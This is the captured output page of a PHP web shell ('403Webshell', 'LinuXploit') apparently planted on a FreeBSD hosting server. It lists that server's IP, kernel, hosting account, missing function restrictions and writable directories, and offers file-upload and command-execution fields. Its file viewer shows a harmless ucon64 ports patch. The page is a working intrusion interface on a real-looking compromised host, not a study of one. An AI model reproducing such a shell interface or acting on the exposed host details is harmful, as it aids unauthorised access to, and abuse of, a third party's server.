403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/emulators/ucon64/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/emulators/ucon64/files/patch-ucon64__misc.c
--- ucon64_misc.c.orig	2019-05-30 17:27:48 UTC
+++ ucon64_misc.c
@@ -576,7 +576,7 @@ ucon64_load_discmage (void)
 {
   uint32_t version;
 #ifdef  DLOPEN
-  const char *p = get_property (ucon64.configfile, "discmage_path", PROPERTY_MODE_FILENAME);
+  const char *p = "%%PREFIX%%/lib/libdiscmage.so";
   if (p)
     strcpy (ucon64.discmage_path, p);
   else
@@ -1235,7 +1235,7 @@ ucon64_set_property_array (const char *org_configfile)
 #elif   defined __APPLE__                       // Mac OS X actually
                        PROPERTY_MODE_DIR ("ucon64") "discmage.dylib",
 #elif   defined __unix__ || defined __BEOS__
-                       PROPERTY_MODE_DIR ("ucon64") "discmage.so",
+                       "%%PREFIX%%/lib/libdiscmage.so",
 #else
                        "",
 #endif

Youez - 2016 - github.com/yon3zu
LinuXploit